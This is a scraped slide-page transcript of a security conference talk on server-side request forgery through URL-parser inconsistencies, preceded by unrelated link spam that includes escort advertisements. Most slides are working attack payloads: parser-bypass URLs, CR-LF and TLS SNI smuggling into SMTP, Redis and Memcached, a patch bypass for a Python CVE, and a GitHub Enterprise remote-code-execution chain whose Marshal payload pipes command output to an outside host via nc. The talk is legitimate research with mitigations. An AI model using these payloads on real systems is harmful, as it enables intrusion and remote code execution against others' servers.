DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINEDJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
 
Introduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxIntroduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptx
 
Water Industry Process Automation & Control Monthly - April 2024
Water Industry Process Automation & Control Monthly - April 2024Water Industry Process Automation & Control Monthly - April 2024
Water Industry Process Automation & Control Monthly - April 2024
 
Glass Ceramics: Processing and Properties
Glass Ceramics: Processing and PropertiesGlass Ceramics: Processing and Properties
Glass Ceramics: Processing and Properties
 
Coefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxCoefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptx
 
Introduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxIntroduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptx
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
 
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingUNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
 
result management system report for college project
result management system report for college projectresult management system report for college project
result management system report for college project
 
Russian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur Escorts
Russian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur EscortsRussian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur Escorts
Russian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur Escorts
 
College Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service NashikCollege Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
 
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
 

A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! by Orange Tsai

  • 1. A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! Orange Tsai
  • 3. The most professional red team in Taiwan About Orange Tsai
  • 4. The largest hacker conference in Taiwan founded by chrO.ot About Orange Tsai
  • 5. Speaker - Speaker at several security conferences Black Hat USA, DEFCON, HITB, HITCON, WooYun, AVTokyo CTFer - CTFs we won champions / in finalists (as team HITCON) DEFCON, Codegate, Boston Key Party, HITB, Seccon, 0CTF, WCTF Bounty Hunter - Vendors I have found Remote Code Execution Facebook, GitHub, Uber, Apple, Yahoo, Imgur About Orange Tsai
  • 6. Agenda Introduction Make SSRF great again Issues that lead to SSRF-Bypass Issues that lead to protocol smuggling Case studies and Demos Mitigations
  • 7. What is SSRF? Server Side Request Forgery Bypass Firewall, Touch Intranet Compromise Internal services Struts2 Redis Elastic
  • 8. Protocol Smuggling in SSRF Make SSRF more powerful Protocols that are suitable to smuggle HTTP based protocol Elastic, CouchDB, Mongodb, Docker Text-based protocol FTP, SMTP, Redis, Memcached
  • 9. Quick Fun Example http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
  • 11. Python is so Hard
  • 12. Quick Fun Example CR-LF Injection on HTTP protocol Smuggling SMTP protocol over HTTP protocol http://127.0.0.1:25/%0D%0AHELO orange.tw%0D%0AMAIL FROM… >> GET / << 421 4.7.0 ubuntu Rejecting open proxy localhost [127.0.0.1] >> HELO orange.tw Connection closed
  • 13. SMTP Hates HTTP Protocol It Seems Unexploitable
  • 14. Gopher Is Good What If There Is No Gopher Support?
  • 15. HTTPS What Won't Be Encrypted in a SSL Handshake?
  • 16. Quick Fun Example https://127.0.0.1□%0D%0AHELO□orange.tw%0D%0AMAIL□FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c +127.0.0.1 ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange. tw..MAI 000001f0: 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L FROM.......... 00000200: 0300 0102 000a 001c 001a 0017 0019 001c ................ CR-LF Injection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI
  • 17. Quick Fun Example CR-LF Injection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI https://127.0.0.1□%0D%0AHELO□orange.tw%0D%0AMAIL□FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c +127.0.0.1 ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange.tw..MAI 000001f0: 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L FROM.......... 00000200: 0300 0102 000a 001c 001a 0017 0019 001c ................
  • 18. Quick Fun Example CR-LF Injection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI https://127.0.0.1□%0D%0AHELO orange.tw%0D%0AMAIL FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c +127.0.0.1 ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange.tw..MAI 000001f0: 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L FROM.......... 00000200: 0300 0102 000a 001c 001a 0017 0019 001c ................
  • 19. Quick Fun Example CR-LF Injection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI https://127.0.0.1□%0D%0AHELO orange.tw%0D%0AMAIL FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 >> ...5./.0.,.=.j.8.2.........0...+127.0.0.1 << 500 5.5.1 Command unrecognized: ...5./.0.,.=.j.8.2..0.+127.0.0.1 >> HELO orange.tw << 250 ubuntu Hello localhost [127.0.0.1], please meet you >> MAIL FROM: <admin@orange.tw> << 250 2.1.0 <admin@orange.tw>... Sender ok
  • 21. URL Parsing Issues It's all about the inconsistency between URL parser and requester Why validating a URL is hard? 1. Specification in RFC2396, RFC3986 but just SPEC 2. WHATWG defined a contemporary implementation based on RFC but different languages still have their own implementations
  • 23. URL Components(RFC 3986) foo://example.com:8042/over/there?name=bar#nose (We only care about HTTP HTTPS) (It's complicated) (I don't care) (I don't care) scheme authority (It's complicated) path fragment query
  • 24. Big Picture Libraries/Vulns CR-LF Injection URL Parsing Path Host SNI Port Injection Host Injection Path Injection Python httplib 💀 💀 💀 Python urllib 💀 💀 💀 Python urllib2 💀 💀 Ruby Net::HTTP 💀 💀 💀 Java net.URL 💀 💀 Perl LWP 💀 💀 NodeJS http 💀 💀 PHP http_wrapper 💀 💀 Wget 💀 💀 cURL 💀 💀
  • 25. Consider the following PHP code $url = 'http://' . $_GET[url]; $parsed = parse_url($url); if ( $parsed[port] == 80 && $parsed[host] == 'google.com') { readfile($url); } else { die('You Shall Not Pass'); } Abusing URL Parsers
  • 27. http://127.0.0.1:11211:80/ PHP readfile Perl LWP PHP parse_url Perl URI Abusing URL Parsers
  • 28. RFC3986 authority = [ userinfo "@" ] host [ ":" port ] port = *DIGIT host = IP-literal / IPv4address / reg-name reg-name = *( unreserved / pct-encoded / sub-delims ) unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~" sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "=" Abusing URL Parsers
  • 31. Several programing languages suffered from this issue cURL, PHP, Python RFC3968 section 3.2 The authority component is preceded by a double slash ("//") and is terminated by the next slash ("/"), question mark ("?"), or number sign ("#") character, or by the end of the URI Abusing URL Parsers
  • 34. http://foo@evil.com:80@google.com/ cURL libcurl NodeJS URL Perl URI Go net/url PHP parse_url Ruby addressable Abusing URL Parsers
  • 35. Abusing URL Parsers cURL / libcurl PHP parse_url 💀 Perl URI 💀 Ruby uri Ruby addressable 💀 NodeJS url 💀 Java net.URL Python urlparse Go net/url 💀
  • 36. Report the bug to cURL team and get a patch quickly Bypass the patch with a space Abusing URL Parsers http://foo@127.0.0.1 @google.com/
  • 37. Report Again But… "curl doesn't verify that the URL is 100% syntactically correct. It is instead documented to work with URLs and sort of assumes that you pass it correct input"
  • 38. Won't Fix But previous patch still applied on cURL 7.54.0
  • 39. Consider the following NodeJS code NodeJS Unicode Failure var base = "http://orange.tw/sandbox/"; var path = req.query.path; if (path.indexOf("..") == -1) { http.get(base + path, callback); }
  • 44. / is new ../(in NodeJS HTTP) (U+FF2E) Full width Latin capital letter N
  • 46. NodeJS Unicode Failure HTTP module prevents requests from CR-LF Injection Encode the New-lines as URL encoding http://127.0.0.1:6379/rnSLAVEOF orange.tw 6379rn $ nc -vvlp 6379 >> GET /%0D%0ASLAVEOF%20orange.tw%206379%0D%0A HTTP/1.1 >> Host: 127.0.0.1:6379 >> Connection: close
  • 47. NodeJS Unicode Failure HTTP module prevents requests from CR-LF Injection Break the protections by Unicode U+FF0D U+FF0A http://127.0.0.1:6379/-*SLAVEOF@orange.tw@6379-* $ nc -vvlp 6379 >> GET / >> SLAVEOF orange.tw 6379 >> HTTP/1.1 >> Host: 127.0.0.1:6379 >> Connection: close
  • 48. GLibc NSS Features In Glibc source code file resolv/ns_name.c#ns_name_pton() /*% * Convert an ascii string into an encoded domain name as per RFC1035. */ int ns_name_pton(const char *src, u_char *dst, size_t dstsiz)
  • 49. GLibc NSS Features RFC1035 - Decimal support in gethostbyname() void main(int argc, char **argv) { char *host = "or097nge.tw"; struct in_addr *addr = gethostbyname(host)->h_addr; printf("%sn", inet_ntoa(*addr)); } …50.116.8.239
  • 50. GLibc NSS Features RFC1035 - Decimal support in gethostbyname() >>> import socket >>> host = 'orange.tw' >>> print host orange.tw >>> socket.gethostbyname(host) '50.116.8.239'
  • 51. GLibc NSS Features void main(int argc, char **argv) { struct addrinfo *res; getaddrinfo("127.0.0.1 foo", NULL, NULL, &res); struct sockaddr_in *ipv4 = (struct sockaddr_in *)res->ai_addr; printf("%sn", inet_ntoa(ipv4->sin_addr)); } …127.0.0.1 Linux getaddrinfo() strip trailing rubbish followed by whitespaces
  • 52. GLibc NSS Features Linux getaddrinfo() strip trailing rubbish followed by whitespaces Lots of implementations relied on getaddrinfo() >>> import socket >>> socket.gethostbyname("127.0.0.1rnfoo") '127.0.0.1'
  • 53. GLibc NSS Features Exploit Glibc NSS features on URL Parsing http://127.0.0.1tfoo.google.com http://127.0.0.1%09foo.google.com http://127.0.0.1%2509foo.google.com
  • 54. GLibc NSS Features Exploit Glibc NSS features on URL Parsing Why this works? Some library implementations decode the URL twice… http://127.0.0.1%2509foo.google.com
  • 55. Exploit Glibc NSS features on Protocol Smuggling HTTP protocol 1.1 required a host header $ curl -vvv http://I-am-a-very-very-weird-domain.com >> GET / HTTP/1.1 >> Host: I-am-a-very-very-weird-domain.com >> User-Agent: curl/7.53.1 >> Accept: */* GLibc NSS Features
  • 56. GLibc NSS Features Exploit Glibc NSS features on Protocol Smuggling HTTP protocol 1.1 required a host header http://127.0.0.1rnSLAVEOF orange.tw 6379rn:6379/ $ nc -vvlp 6379 >> GET / HTTP/1.1 >> Host: 127.0.0.1 >> SLAVEOF orange.tw 6379 >> :6379 >> Connection: close
  • 57. GLibc NSS Features https://127.0.0.1rnSET foo 0 60 5rn:443/ $ nc -vvlp 443 >> ..=5</.Aih9876.'. #...$...?...).%..g@?>3210...EDCB.. >> .....5'%"127.0.0.1 >> SET foo 0 60 5 Exploit Glibc NSS features on Protocol Smuggling SNI Injection - Embed hostname in SSL Client Hello Simply replace HTTP with HTTPS
  • 58. GLibc NSS Features Break the Patch of Python CVE-2016-5699 CR-LF Injection in HTTPConnection.putheader() Space followed by CR-LF? _is_illegal_header_value = re.compile(rb'n(?![ t])|r(?![ tn])').search … if _is_illegal_header_value(values[i]): raise ValueError('Invalid header value %r' % (values[i],))
  • 59. Break the Patch of Python CVE-2016-5699 CR-LF Injection in HTTPConnection.putheader() Space followed by CR-LF? Bypass with a leading space >>> import urllib >>> url = 'http://0rn SLAVEOF orange.tw 6379rn :80' >>> urllib.urlopen(url) GLibc NSS Features
  • 60. Break the Patch of Python CVE-2016-5699 Exploit with a leading space Thanks to Redis and Memcached GLibc NSS Features http://0rn SLAVEOF orange.tw 6379rn :6379/ >> GET / HTTP/1.0 << -ERR wrong number of arguments for 'get' command >> Host: 0 << -ERR unknown command 'Host:' >> SLAVEOF orange.tw 6379 << +OK Already connected to specified master
  • 61. Abusing IDNA Standard The problem relied on URL parser and URL requester use different IDNA standard IDNA2003 UTS46 IDNA2008 ⓖⓞⓞⓖⓛⓔ.com google.com google.com Invalid gu200Doogle.com google.com google.com xn--google-pf0c.com baß.de bass.de bass.de xn--ba-hia.de
  • 62. Abusing IDNA Standard >> "ß".toLowerCase() "ß" >> "ß".toUpperCase() "SS" >> ["ss", "SS"].indexOf("ß") false >> location.href = "http://wordpreß.com" The problem relied on URL parser and URL requester use different IDNA standard
  • 64. Abusing URL Parsers - Case Study WordPress 1. Paid lots of attentions on SSRF protections 2. We found 3 distinct ways to bypass the protections 3. Bugs have been reported since Feb. 25, 2017 but still unpatched 4. For the Responsible Disclosure Process, I will use MyBB as following case study
  • 65. Abusing URL Parsers - Case Study The main concept is finding different behaviors among URL parser, DNS checker and URL requester URL parser DNS checker URL requester WordPress parse_url() gethostbyname() *cURL vBulletin parse_url() None *cURL MyBB parse_url() gethostbynamel() *cURL * First priority
  • 66. Abusing URL Parsers - Case Study SSRF-Bypass tech #1 Time-of-check to Time-of-use problem 1 $url_components = @parse_url($url); 2 if( 3 !$url_components || 4 empty($url_components['host']) || 5 (!empty($url_components['scheme']) && !in_array($url_components['scheme'], array('http', 'https'))) || 6 (!empty($url_components['port']) && !in_array($url_components['port'], array(80, 8080, 443))) 7 ) { return false; } 8 9 $addresses = gethostbynamel($url_components['host']); 10 if($addresses) { 11 // check addresses not in disallowed_remote_addresses 12 } 13 14 $ch = curl_init(); 15 curl_setopt($ch, CURLOPT_URL, $url); 16 curl_exec($ch);
  • 67. Abusing URL Parsers - Case Study 1. gethostbyname() and get 1.2.3.4 2. Check 1.2.3.4 not in blacklist 3. Fetch URL by curl_init() and cURL query DNS again! 4. 127.0.0.1 fetched, SSRF! Q: foo.orange.tw A: 1.2.3.4 Q: foo.orange.tw A: 127.0.0.1 http://foo.orange.tw/ Hacker MyBB DNS 1 2 4 3
  • 68. Abusing URL Parsers - Case Study SSRF-Bypass tech #2 The inconsistency between DNS checker and URL requester There is no IDNA converter in gethostbynamel(), but cURL has 1 $url = 'http://ß.orange.tw/'; // 127.0.0.1 2 3 $host = parse_url($url)[host]; 4 $addresses = gethostbynamel($host); // bool(false) 5 if ($address) { 6 // check if address in white-list 7 } 8 9 $ch = curl_init(); 10 curl_setopt($ch, CURLOPT_URL, $url); 11 curl_exec($ch);
  • 69. Abusing URL Parsers - Case Study SSRF-Bypass tech #3 The inconsistency between URL parser and URL requester Fixed in PHP 7.0.13 …127.0.0.1:11211 fetched $url = 'http://127.0.0.1:11211#@google.com:80/'; $parsed = parse_url($url); var_dump($parsed[host]); // string(10) "google.com" var_dump($parsed[port]); // int(80) curl($url);
  • 70. Abusing URL Parsers - Case Study SSRF-Bypass tech #3 The inconsistency between URL parser and URL requester Fixed in cURL 7.54 (The version of libcurl in Ubuntu 17.04 is still 7.52.1) $url = 'http://foo@127.0.0.1:11211@google.com:80/'; $parsed = parse_url($url); var_dump($parsed[host]); // string(10) "google.com" var_dump($parsed[port]); // int(80) curl($url); …127.0.0.1:11211 fetched
  • 71. Abusing URL Parsers - Case Study SSRF-Bypass tech #3 The inconsistency between URL parser and URL requester cURL won't fix :) $url = 'http://foo@127.0.0.1 @google.com:11211/'; $parsed = parse_url($url); var_dump($parsed[host]); // string(10) "google.com" var_dump($parsed[port]); // int(11211) curl($url); …127.0.0.1:11211 fetched
  • 72. Protocol Smuggling - Case Study GitHub Enterprise Standalone version of GitHub Written in Ruby on Rails and code have been obfuscated
  • 73. Protocol Smuggling - Case Study About Remote Code Execution on GitHub Enterprise Best report in GitHub 3rd Bug Bounty Anniversary Promotion! Chaining 4 vulnerabilities into RCE
  • 74. Protocol Smuggling - Case Study First bug - SSRF-Bypass on Webhooks What is Webhooks?
  • 75. Protocol Smuggling - Case Study First bug - SSRF-Bypass on Webhooks Fetching URL by gem faraday Blacklisting Host by gem faraday-restrict-ip-addresses Blacklist localhost, 127.0.0.1… ETC Simply bypassed with a zero http://0/
  • 76. Protocol Smuggling - Case Study First bug - SSRF-Bypass on Webhooks There are several limitations in this SSRF Not allowed 302 redirection Not allowed scheme out of HTTP and HTTPS No CR-LF Injection in faraday Only POST method
  • 77. Protocol Smuggling - Case Study Second bug - SSRF in internal Graphite service GitHub Enterprise uses Graphite to draw charts Graphite is bound on 127.0.0.1:8000 url = request.GET['url'] proto, server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse()
  • 79. Protocol Smuggling - Case Study Third bug - CR-LF Injection in Graphite Graphite is written in Python The implementation of the second SSRF is httplib.HTTPConnection As I mentioned before, httplib suffers from CR-LF Injection We can smuggle other protocols with URL http://0:8000/composer/send_email ?to=orange@chroot.org &url=http://127.0.0.1:6379/%0D%0ASET…
  • 80. Protocol Smuggling - Case Study Fourth bug - Unsafe Marshal in Memcached gem GitHub Enterprise uses Memcached gem as the cache client All Ruby objects stored in cache will be Marshal-ed
  • 81. Protocol Smuggling - Case Study http://0:8000/composer/send_email ?to=orange@chroot.org &url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/quer ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation %3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB %07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A %06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A First SSRF Second SSRF Memcached protocol Marshal data
  • 82. Protocol Smuggling - Case Study http://0:8000/composer/send_email ?to=orange@chroot.org &url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/quer ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation %3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB %07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A %06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A First SSRF Second SSRF Memcached protocol Marshal data
  • 83. Protocol Smuggling - Case Study http://0:8000/composer/send_email ?to=orange@chroot.org &url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/quer ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation %3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB %07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A %06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A First SSRF Second SSRF Memcached protocol Marshal data $12,500
  • 84. Demo GitHub Enterprise < 2.8.7 Remote Code Execution https://youtu.be/GoO7_lCOfic
  • 85. Mitigations Application layer Use the only IP and hostname, do not reuse the input URL Network layer Using Firewall or NetWork Policy to block Intranet traffics Projects SafeCurl by @fin1te Advocate by @JordanMilne
  • 86. Summary New Attack Surface on SSRF-Bypass URL Parsing Issues Abusing IDNA Standard New Attack Vector on Protocol Smuggling Linux Glibc NSS Features NodeJS Unicode Failure Case Studies
  • 87. Further works URL parser issues in OAuth URL parser issues in modern browsers URL parser issues in Proxy server …
  • 88. Acknowledgements 1. Invalid URL parsing with '#' by @bagder 2. URL Interop by @bagder 3. Shibuya.XSS #8 by @mala 4. SSRF Bible by @Wallarm 5. Special Thanks Allen Own Birdman Chiu Henry Huang